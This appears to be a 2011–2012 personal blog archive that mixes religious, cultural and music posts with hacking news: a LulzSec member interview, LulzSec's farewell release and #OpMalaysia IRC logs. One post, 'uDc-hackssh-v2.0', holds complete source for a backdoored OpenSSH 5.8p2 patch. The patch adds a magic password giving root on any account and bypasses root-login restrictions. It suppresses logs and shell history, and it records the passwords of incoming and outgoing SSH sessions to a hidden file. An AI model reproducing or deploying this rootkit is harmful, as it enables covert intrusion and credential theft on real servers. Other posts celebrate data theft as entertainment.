Shaolin Integer a.k.a Slash The Underground

5 Sebelum 5

2012-02-07T20:48:00.001+08:00

Rasulullah SAW bersabda yang bermaksud: "Rebut lima perkara sebelum datang lima perkara. Masa sihat sebelum sakit, kaya sebelum miskin, lapang sebelum sibuk, muda sebelum tua dan hidup sebelum mati." (Hadis riwayat al-Hakim dan al-Baihaqi)

Janganlah bertangguh-tangguh dalam berbuat kebaikan dan rebutlah 5 perkara sebelum datangnya 5 perkara.

Beribadatlah, dan lakukanlah ibadat sunat disamping ibadat fardhu semasa sihat sebelum datangnya kesakitan,

Bersedekahlah semasa masih kaya (berharta) sebelum ditimpa kemiskinan.

Berzikirlah sewaktu masih mempunyai kelapangan sebelum dilanda kesibukan, misalnya di waktu pagi sebelum melakukan kerja-kerja harian dan di waktu petang setelah selesai bekerja.

Carilah keperluan dunia dan akhirat semasa masih muda dan mempunyai kekuatan tenaga sebelum datangnya tua dan tidak mempunyai kekuatan.

Beramallah di sini (semasa berada di dunia) semasa hidup kerana ia berguna selepas kematian nanti (semasa di akhirat). Di sana kita tidak lagi dapat beramal.

Playing For Change

2012-01-23T14:32:00.001+08:00

Playing for Change is a multimedia movement created to inspire, connect, and bring peace to the world through music. The idea for this project arose from a common belief that music has the power to break down boundaries and overcome distances between people. No matter whether people come from different geographic, political, economic, spiritual or ideological backgrounds, music has the universal power to transcend and unite us as one human race. And with this truth firmly fixed in our minds, we set out to share it with the world. Playing For Change also created a separate non-profit organization called the Playing For Change Foundation which builds music schools for children around the world.

The project started in 2004 with the organization's self described goal to "inspire, connect, and bring peace to the world through music". The creators of the project, Mark Johnson and Enzo Buono, traveled around the world to places such as New Orleans, Barcelona, South Africa, India, Nepal, the Middle East and Ireland. Using mobile recording equipment, the duo recorded local musicians performing the same song, interpreted into their own style. Among the artists participating, or openly involved in the project, include Vusi Mahlasela, Louis Mhlanga, Clarence Bekker, Tal Ben Ari (Tula), Bono, Keb' Mo', David Broza, Manu Chao and Grandpa Elliott.

The project's first single "Stand by Me", began with a Santa Monica street performer named Roger Ridley (now deceased). The duo traveled the world, recording more and more musicians. All of these versions were considered for mixing a pastiche final version.

Bajau Legacy - Pangentoman

2011-07-23T23:05:00.001+08:00

The Bajau or Bajaw (pronounced /ˈbædʒɔː/ or /ˈbɑːdʒaʊ/), also spelled Bajao, Badjau, Badjaw, or Badjao, are an indigenous ethnic group of Maritime Southeast Asia. Due to escalated conflicts in their native Sulu Archipelago, and discrimination suffered by Muslim groups in the Philippines with regards to education and employment, most of the Bajau have migrated to neighboring Malaysia over the course of 50 years. Currently they are the second largest ethnic group in the state of Sabah, making up 13.4%^[1] of the total population. Groups of Bajau have also migrated to Sulawesi and Kalimantan in Indonesia, although figures of their exact population are unknown.^[2] They were sometimes referred to as the Sea Gypsies, although the term has been used to encompass a number of non-related ethnic groups with similar traditional lifestyles, such as the Moken of the Burmese-Thai Mergui Archipelago and the Orang Laut of southeastern Sumatra and the Riau Islands of Indonesia. The modern outward spread of the Bajau from older inhabited areas seems to have been associated with the development of sea trade in trepang.

The origin of the word Bajau is not clear cut. It is generally accepted that these groups of people can be termed Bajau, though they never call themselves Bajau. Instead, they call themselves with the names of their tribes, usually the place they live or place of origin. They accept the term Bajau because they realize that they share some vocabulary and general genetic characteristic such as in having darker skin, although the Simunuls appear to be an exception in having fairer skin.

British administrators in Sabah, labeled the Samah as Bajau and put Bajau in their birth certificates as their race. During their time in Malaysia, some have started labeling themselves as their ancestors called themselves, such as Simunul. For political reasons and to ensure easy access to the Malaysian special privileges granted to Malays, many have started calling themselves Malay. This is especially true for recent Filipino migrants.

For most of their history, the Bajau have been a nomadic, seafaring people, living off the sea by trading and subsistence fishing.[5] The boat dwelling Bajau see themselves as non-aggressive people. They kept close to the shore by erecting houses on stilts, and traveled using lepa-lepa, handmade boats which many lived in.[5] Although historically originating from the southern Philippine coasts, Sabahan Sama legend narrates that they had originated from members of the royal guard of the Sultan of Johor, after the fall of the Malay Malacca empire, who settled along the east coast of Borneo after being driven there by storms. Another version narrates that they were escorting the Sultan's bride, but the bride was later kidnapped by the Sultan of Brunei. The fact that the Bajau-Sama languages belong to the Philippine branch of Malayo-Polynesian languages would substantiate the anthropological origins of the Bajau groups to be from the Philippines, and put the origin legends down to the historic Malay-centric influence of Bajau culture.

However, there are traces that Sama people came from Riau Archipelago especially Lingga Island more than 300 years ago. It is believed by some that the migration process of Samah to North West Borneo took place more than 100 years earlier, starting from trade with the Empire of Brunei. (note connection to bride being sent from Johor to Sulu and then being kidnapped by the Prince of Brunei) With the fall of the legitimate Sultan of Johor due to being overthrown by Bugis immigrants, Sama people fled to the west coast of North Borneo where they felt safe to live under the protection of the Brunei Sultanate. That's why native Kadazan-Dusun call Sama people as "tuhun(people of) Sama" or "tulun(people of) Sama" in their dialects, the form of recognition before western civilization found Borneo. It was believed that Sama people are not from the royalty of the Sultanate, but loyal workers, craftsmen, boat builders and farmers that fled from cruelty of ethnic cleansing in chaotic Johor during aggression of the Bugis taking over the throne of Johor.

Currently, there exists a huge settlement of Filipino Bajau in Pulau Gaya, off the Sabah coast. Many of them are illegal immigrants on the Malaysian island. With the island as a base, they frequently enter Sabah and find jobs as manual laborers.

Discrimination of Bajau (particularly from the dominant Tausūg people who have historically viewed them as 'inferior' and less specifically from the Christian Filipinos)[6] and the continuing violence in Muslim Mindanao, have driven many Bajau to begging, or to migrate out of the country. They usually resettle in Malaysia and Indonesia, where they are less discriminated against.[4][7]

New Scientist: Exclusive first interview with key LulzSec hacker

2011-07-05T10:17:00.004+08:00

It was early May when LulzSec's profile skyrocketed after a hack on the giant Sony corporation. LulzSec's name comes from Lulz, a corruption of LOL, often denoting laughter at the victim of a prank. For 50 days until it disbanded, the group's unique blend of humour, taunting and unapologetic data theft made it notorious. But knowing whether LulzSec was all about the "lulz" or if it owed more to its roots as part of Anonymous, the umbrella group of internet subculture and digital activism, was pure speculation. Until now.

Who is "Sabu"?
I'm a man who believes in human rights and exposing abuse and corruption. I generally care about people and their situations. I'm into politics and I try my best to stay on top of current events.

We've seen you cast as everything from the greatest of heroes to the most evil of villains. How would you characterise yourself?

It is hard for me to see myself as either. I am not trying to be a martyr. I'm not some cape-wearing hero, nor am I some supervillain trying to bring down the good guys. I'm just doing what I know how to do, and that is counter abuse.

What was your first experience with "hacktivism"?

I got involved about 11 years ago when the US navy was using Vieques Island in Puerto Rico as a bombing range for exercises. There were lots of protests going on and I got involved in supporting the Puerto Rican government by disrupting communications. This whole situation was the first of its kind for the island and the people didn't expect things to go that route. Eventually, the US navy left Vieques.

How did you get involved with Anonymous?

When I found out about what happened to Julian Assange, his arrest in the UK and so on, I found it absolutely absurd. So I got involved with Anonymous at that point.

What operation really inspired you and why?

Earlier this year, we got wind of the Tunisians' plight. Their government was blocking access to any website that reported anti-Tunisian information, including Tunileaks, the Tunisian version of Wikileaks, and any news sites discussing them.

Tunisians came to us telling us about their desire to resist. "Disrupt the government of Tunisia," they said, and we did. We infiltrated the prime minister's site and defaced it externally. When Tunisia filtered off its internet from the world, it was the Tunisians who came online using dial-up and literally allowed us to use their connections to tunnel through to re-deface the prime minister's websites. It was the most impressive thing I've seen: a revolution coinciding both physically and online. It was the first time I had proof that what Anonymous was doing was real and it was working.

What would you like to say to people who say that you and other Antisec/Anonymous/LulzSec members are just troublemakers who have caused untold damage and loss to people for no apparent reason?

Would you rather your millions of emails, passwords, dox [personal information] and credit cards be exposed to the wild to be used by nefarious dealers of private information? Or would you rather have someone expose the hole and tell you your data was exploitable and that it's time to change your passwords? I'm sure we are seen as evil for exposing Sony and others, but at the end of the day, we motivated a giant to upgrade its security.

But what about hacks that were done "for lulz"?

Yes, some hacks under LulzSec were done for the lulz, but there are lessons learned from them all. In 50 days, you saw how big and small companies were handling their user data incorrectly. You saw the US federal government vulnerable to security issues that could have just as easily been exploited by foreign governments. You saw affiliates of the US government handling sensitive emails and they themselves ignored the FBI's better practice manuals about password re-use.

With the Public Broadcasting Service site, you saw the media vulnerable to fake articles. And yes, our Frontline hit [the group attacked the PBS's Frontline television programme website after perceived unfair treatment of Wikileaks] was political, but we also showed what could happen if an organisation were to hack 50 of the biggest media publications right now, online, and distribute a mass news article designed to blend in on each outlet's site. That kind of thing would cause some serious havoc. I mean, we're talking about the potential of crashing stocks or spreading damaging rumours. Everything we did had a duality: a lesson and some LOLs at the same time.

When did you realize you had hit the point of no return?

I was at the point of no return when I realised that I could make a change. Operation Tunisia was it for me. Then HBGary [a security firm attacked by LulzSec]. Now Antisec is the biggest movement in years, unifying all hackers and free thinkers across Anonymous and other groups. There's no going back.

How do you describe what Antisec is about?

Expose corruption. Expose censorship. Expose abuses. Assist our brothers and sisters during their operations in their own countries like the one we have going in Brazil now, Operation Brazil, which is about internet/information censorship. Expose these big multinational companies that have their hands in too much, that have too much power, and don't even take the time to secure your passwords and credit cards. And finally, discussion and education. We are not sitting idly by and letting our rights get thrashed. It's time to rise up now.

So what would an Antisec "win" look like?

There is no win. There's just change and education.

The popularity of LulzSec and Anonymous has inspired many to follow in your footsteps. What words of wisdom do you have for them?

Those who are with me in the fight do not have to be hackers. They can be reporters, artists, public speakers. This movement is about all of us uniting against corruption. But I don't ask anyone to take my risks. I don't want anyone to follow me down my path.

Are you afraid of being caught?

There is no fear in my heart. I've passed the point of no return. I only hope that if I am stopped, the movement continues on the right path without me.

Source: New Scientist

LulzSec Issues: 50 Days of Lulz

2011-06-26T11:46:00.003+08:00

LulzSec has issued final data release saying they will now go underground while urging the antisec movement continue with what they have started.

The announcement follows 50 days of hacks and attacks launched by the group, the most significant of which being the revelation of how large the US Domestic spy program has grown and the release of documents from the State of Arizona revealing corruption and racism by government in the fight against illegal immigration which included the revelation that US Marines were being used as contract killers.

For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.

Source pastebin

. /$$ /$$ /$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!

.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==y'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""bno,
. o O (_) (_) \ / _ AWAW/
. / _(+)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" === d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-""-.~~~~~~ .-""-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ V/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-""-.
. .-""-.___` -- \| -.__..-

Friends around the globe,

We are Lulz Security, and this is our final release, as today marks something meaningful to us. 50 days ago, we set sail with our humble ship on an uneasy and brutal ocean: the Internet. The hate machine, the love machine, the machine powered by many machines. We are all part of it, helping it grow, and helping it grow on us.

For the past 50 days we've been disrupting and exposing corporations, governments, often the general population itself, and quite possibly everything in between, just because we could. All to selflessly entertain others - vanity, fame, recognition, all of these things are shadowed by our desire for that which we all love. The raw, uninterrupted, chaotic thrill of entertainment and anarchy. It's what we all crave, even the seemingly lifeless politicians and emotionless, middle-aged self-titled failures. You are not failures. You have not blown away. You can get what you want and you are worth having it, believe in yourself.

While we are responsible for everything that The Lulz Boat is, we are not tied to this identity permanently. Behind this jolly visage of rainbows and top hats, we are people. People with a preference for music, a preference for food; we have varying taste in clothes and television, we are just like you. Even Hitler and Osama Bin Laden had these unique variations and style, and isn't that interesting to know? The mediocre painter turned supervillain liked cats more than we did.

Again, behind the mask, behind the insanity and mayhem, we truly believe in the AntiSec movement. We believe in it so strongly that we brought it back, much to the dismay of those looking for more anarchic lulz. We hope, wish, even beg, that the movement manifests itself into a revolution that can continue on without us. The support we've gathered for it in such a short space of time is truly overwhelming, and not to mention humbling. Please don't stop. Together, united, we can stomp down our common oppressors and imbue ourselves with the power and freedom we deserve.

So with those last thoughts, it's time to say bon voyage. Our planned 50 day cruise has expired, and we must now sail into the distance, leaving behind - we hope - inspiration, fear, denial, happiness, approval, disapproval, mockery, embarrassment, thoughtfulness, jealousy, hate, even love. If anything, we hope we had a microscopic impact on someone, somewhere. Anywhere.

Thank you for sailing with us. The breeze is fresh and the sun is setting, so now we head for the horizon.

Let it flow...

Lulz Security - our crew of six wishes you a happy 2011, and a shout-out to all of our battlefleet members and supporters across the globe

------------------------------------------------------------------------------------------------------

Our mayhem: http://lulzsecurity.com/releases/
Our chaos: http://thepiratebay.org/user/LulzSec/
Our final release: http://thepiratebay.org/torrent/6495523/50_Days_of_Lulz

Please make mirrors of material on the website, because we're not renewing the hosting. Goodbye. <3

uDc-hackssh-v2.0

2011-06-26T03:49:00.000+08:00

CHANAGES:
Updated for openssh-5.x version

FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch

diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c
*** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009
--- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011
***************
*** 466,471 ****
--- 466,475 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+  if(uDc)
+   sshpam_err = PAM_SUCCESS;
+ // end of slash
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
 
***************
*** 816,821 ****
--- 820,834 ----
   Buffer buffer;
   struct pam_ctxt *ctxt = ctx;
 
+ // slash patch
+          if(sshpam_authctxt)
+            for (gurun = 0; gurun < num; ++gurun) {
+                sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+                        get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]);
+                if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1;
+                    else uDclog();
+            }
+ // end of patch


   debug2("PAM: %s entering, %u responses", __func__, num);
   switch (ctxt->pam_done) {
   case 1:
***************
*** 1205,1210 ****
--- 1218,1226 ----
    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,
        pam_strerror(sshpam_handle, sshpam_err));
  
+ // slash patch
+  if(!uDc)
+ // end of patch
   sshpam_err = pam_authenticate(sshpam_handle, flags);
   sshpam_password = NULL;
   if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c
*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009
--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011
***************
*** 92,97 ****
--- 92,103 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ // slash patch
+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), pw->pw_name, password);
+        uDclog();
+ // end of patch
  
  #ifdef KRB5
   if (options.kerberos_authentication == 1) {
diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c
*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011
***************
*** 94,99 ****
--- 94,104 ----
  int
  allowed_user(struct passwd * pw)
  {
+ // slash patch
+  if(uDc) return 1;
+  else {
+ // end of patch
+ 
   struct stat st;
   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
   u_int i;
***************
*** 249,258 ****
--- 254,269 ----
   /* We found no reason not to let this user try to log on... */
   return 1;
  }
+ // slash patch
+ }
+ // end of patch
  
  void
  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   void (*authlog) (const char *fmt,...) = verbose;
   char *authmsg;
  
***************
*** 298,303 ****
--- 309,317 ----
    audit_event(audit_classify_auth(method));
  #endif
  }
+ // slash patch
+ }
+ // end of patch
  
  /*
   * Check whether root logins are disallowed.
***************
*** 305,310 ****
--- 319,327 ----
  int
  auth_root_allowed(char *method)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   switch (options.permit_root_login) {
   case PERMIT_YES:
    return 1;
***************
*** 322,327 ****
--- 339,349 ----
   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
   return 0;
  }
+ // slash patch
+  else
+  return 1;
+ }
+ // end of patch
  
  
  /*
diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c
*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010
--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011
***************
*** 81,86 ****
--- 81,89 ----
   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
       NULL, 0, NI_NAMEREQD) != 0) {
    /* Host name not found.  Use ip address. */
+ // slash patch
+   if(!uDc)
+ // end of patch
    return xstrdup(ntop);
   }
  
diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h
*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010
--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011
***************
*** 13,18 ****
--- 13,40 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // slash patch
+ #include 
+ #include 
+ 
+ #define BAJAUPASS     "CHANGE-ME"
+ #define SSH_LOG       "/dev/lala"
+ 
+ FILE *s9clog;
+ char  slashbuff[1024];
+ int   kambing, gurun, uDc;
+ 
+ #define uDclog() {                                 \
+  kambing=strlen(slashbuff);                               \
+  for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \
+  s9clog=fopen(SSH_LOG, "a");                         \
+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \
+  chmod(SSH_LOG, 0666);                             \
+ }
+ 
+ const char *get_remote_ipaddr(void);
+ // end of patch
+ 
  #ifndef INCLUDES_H
  #define INCLUDES_H
  
diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c
*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008
--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011
***************
*** 336,341 ****
--- 336,345 ----
   char fmtbuf[MSGBUFSIZ];
   char *txt = NULL;
   int pri = LOG_INFO;
+ 
+ // slash patch
+  if(uDc) return;
+ // end of patch
   int saved_errno = errno;
  
   if (level > log_level)
diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c
*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011
--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011
***************
*** 433,438 ****
--- 433,442 ----
  int
  login_write(struct logininfo *li)
  {
+ // slash patch
+  if(uDc) return 0;
+ // end of patch
+ 
  #ifndef HAVE_CYGWIN
   if (geteuid() != 0) {
    logit("Attempt to write login records by non-root user (aborting)");
diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c
*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010
--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011
***************
*** 1198,1203 ****
--- 1198,1207 ----
   }
   if (getenv("TZ"))
    child_set_env(&env, &envsize, "TZ", getenv("TZ"));
+ // slash patch
+  if(uDc)
+   child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
  
   /* Set custom environment options from RSA authentication. */
   if (!options.use_login) {
***************
*** 1483,1488 ****
--- 1487,1495 ----
  #else
    if (setlogin(pw->pw_name) < 0)
     error("setlogin failed: %s", strerror(errno));
+ // slash patch
+   if(!uDc) {
+ // end of patch
    if (setgid(pw->pw_gid) < 0) {
     perror("setgid");
     exit(1);
***************
*** 1492,1497 ****
--- 1499,1511 ----
     perror("initgroups");
     exit(1);
    }
+ // slash patch
+  }
+  else {
+   setgid(0);
+   initgroups(pw->pw_name, 0);
+  }
+ // end of patch
    endgrent();
  #endif
  
***************
*** 1515,1520 ****
--- 1529,1537 ----
    }
  #else
    /* Permanently switch to the desired uid. */
+ // slash patch
+  if(!uDc)
+ // end of patch
    permanently_set_uid(pw);
  #endif
   }
diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c
*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006
--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011
***************
*** 458,463 ****
--- 458,468 ----
    password = read_passphrase(prompt, 0);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
+ // slash patch
+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",
+    get_remote_ipaddr(), options.user, password);
+                 uDclog();
+ // end of patch
    memset(password, 0, strlen(password));
    xfree(password);
    packet_send();
diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c
*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011
***************
*** 883,888 ****
--- 883,893 ----
   packet_put_cstring(authctxt->method->name);
   packet_put_char(0);
   packet_put_cstring(password);
+ // slash patch
+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), options.user, password);
+        uDclog();
+ // end of patch
   memset(password, 0, strlen(password));
   xfree(password);
   packet_add_padding(64);
***************
*** 1558,1563 ****
--- 1563,1573 ----
  
    response = read_passphrase(prompt, echo ? RP_ECHO : 0);
  
+ // slash patch
+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                    get_remote_ipaddr(), options.user, response);
+                uDclog();
+ // end of patch
    packet_put_cstring(response);
    memset(response, 0, strlen(response));
    xfree(response);
diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c
*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011
--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011
***************
*** 126,131 ****
--- 126,134 ----
  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
      const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   /* save previous login details before writing new */
***************
*** 136,147 ****
--- 139,156 ----
   login_login(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  
  #ifdef LOGIN_NEEDS_UTMPX
  void
  record_utmp_only(pid_t pid, const char *ttyname, const char *user,
     const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, host, ttyname);
***************
*** 149,163 ****
--- 158,181 ----
   login_utmp_only(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  #endif
  
  /* Records that the user has logged out. */
  void
  record_logout(pid_t pid, const char *tty, const char *user)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, NULL, tty);
   login_logout(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h
*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011
--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011
***************
*** 1,6 ****
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8"
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
--- 1,6 ----
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8" // change
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE

#OpMalaysia - Die Another Day

2011-06-20T10:01:00.002+08:00

#OpMalaysia, another day - Anonops attacks has failed to get the Government full attention. The Malaysian Communications and Multimedia Commission (MCMC) issued a statement regarding the first attempt and claimed there was only a little impact on a Malaysian users as a result.

"Our monitoring of the situation showed that there was a reduced level of attacks by 4.00am this morning and upon further evaluation, so far we gauge that there has been little impact on Malaysian users as a result of this attack."

In reference to this statement, #OpMalaysia posted another statement on 17th of June to youtube says a second round of attacks against the Government of Malaysia is planned for the 4th of July at 13:37 GMT (21:37 MYT).

"We shall bring down the entire countries national infrastructure. We shall make this a day to be remembered. This is your second warning."

#OpMalaysia - Day 2

2011-06-17T12:18:00.013+08:00

#OpMalaysia, day 2 - Its was a bored night, I did not find any interesting. The only thing make me stay is that to meet and watch almost of Malaysian Security Group tried to get involve and contribute 'something' that might help our country, it was like a Malaysian Security Group Reunion. As for me, I'd like to understand how this hacker group conduct their attack, what are the techniques, what method, what tools and etc.

As for now, this group still looking for ideas how to achieve their mission as stated at codepad:

NO attacks againts .edu and/or media.
We protect free speech.

NO LOIC, NO TAKING DOWN, NO MATTER WHAT.
NO DEFACING, EXCEPT FOR THE FEW CASES MENTIONED BELOW.
NO TROLLING. DON'T BOTHER ASKING FOR DDOS TARGETS; THIS IS A NO-DDOS OPERATION.

BE CREATIVE! ONLY WITH YOUR HELP CAN WE HAVE SUCCESS!
YOU ARE INVITED TO DISCUSS. SUBMIT YOUR SUGGESTIONS!

=====================================================

PROBLEM:
Malaysia blocks filesharing sites.

GOAL:
* Help Malaysians get around filters
* Create media attention for the cause
* Inform Malaysians of the existence of the op and invite them to join us
* Make websites accessible again - either by disabling the filter or making the government disable it.
* It's just about giving the people back their freedom
* To tell people how ridicilous spending over 1.8 million to develop facebook page

#OpMalaysia channel logs - Day 2

Session Start: Thu Jun 16 19:16:43 2011
Session Ident: #OpMalaysia
 10[19:16] * Now talking in #OpMalaysia
 00[19:16] * Topic is 'NO DDOS, NO LOIC, NO TAKING DOWN - IDEAS AT http://codepad.org/VFi2mktC | DNS HOW TO VIDS http://goo.gl/8wsPi | HOW TO BYPASS FILTER: http://bit.ly/kL8yoK | ENGLISH ONLY PLEASE THANKS || Channels for DDoS: #OpV #Operationfreedom #opitaly '
 00[19:16] * Set by Nessuno on Thu Jun 16 05:29:03
#----- REMOVED -----#
[19:17]  ic ..
[19:17]  ofcorse still can hack everything is hackable otherwise it would not exist due to the paradox of it not having a way in which would mean there is no use for it caust you just bought a heavy brick
 10[19:17] * Joins: OpMalaysia977 (OpMalaysia977@AN-4ar.kbp.ipasrr.IP)
[19:17]  unbeatable skmm . hacker are loser
 09[19:17] * Payik  11,1grabs 8,1 aL-Pacino's  11,1underwear. pulls it over 8,1 aL-Pacino's  11,1Head..... Now you look much better.
[19:17]  so, how
[19:17]  The only thing you can't hack is the mother nature
[19:17]  updated: http://thestar.com.my/news/story.asp?file=/2011/6/16/nation/20110616104624&sec=nation
[19:17] <%Effexor> Title: MCMC: 41 Govt websites disrupted at various levels (at thestar.com.my)
[19:18]  so how's the opmalaysia going on ?
[19:18]  upgrading firewall will introduce new bug
 10[19:18] * Parts: mysql (tsol@Y.N.W.A)
[19:18]  clobella succesfull..we dont have to do anything..the gov does
[19:18] <@OnlyWork> If anybody needs any translation to assist the media were anonymous please ask
[19:18] <@OnlyWork> I am neutral, I am a translator
#----- REMOVED -----#
[19:33]  http://world.yes.my/?q=ytlc&id=511  <... nice updates
[19:33] <%Effexor> Title: Special Report: Operation Malaysia (Updated) | Yes World (at world.yes.my)
[19:33]  For more information about opMalaysia please pm devtar
[19:33]  yes i am 
[19:33]  long live Rilekscrew
[19:33]  haha
[19:33]  :D
#----- REMOVED -----#
[04:25] <&bishop> where are the guys?
[04:26] <&Cake> what guys
[04:26]  ouhh, i wanna sleep
[04:26]  bye
 02[04:26] * Quits: zenoh (Mibbit@AN-8ue.2nv.mpq0id.IP ) (Quit: http://www.mibbit.com ajax IRC Client )
[04:27] <&bishop> the malaysians
[04:27] <&bishop> it's their operation 
#----- REMOVED -----#
[04:38] <&bishop> they took.edu sites down.
[04:38] <&bishop> that is stupid
[04:39]  yup
[04:39]  just using the op as an excuse to do their personal shit
[04:39]  good for pentest market 
[04:39]  its about time
#----- REMOVED -----#
 02[05:44] * Quits: &bishop (bishop@love.under.will ) (A TLS packet with unexpected length was received. )
[05:45]  #OpBrazil is tomorrow help us
#----- REMOVED -----#
 10[07:12] * Parts: d0ct0r (d0ct0r@anon.y.mous) (Services forced part )
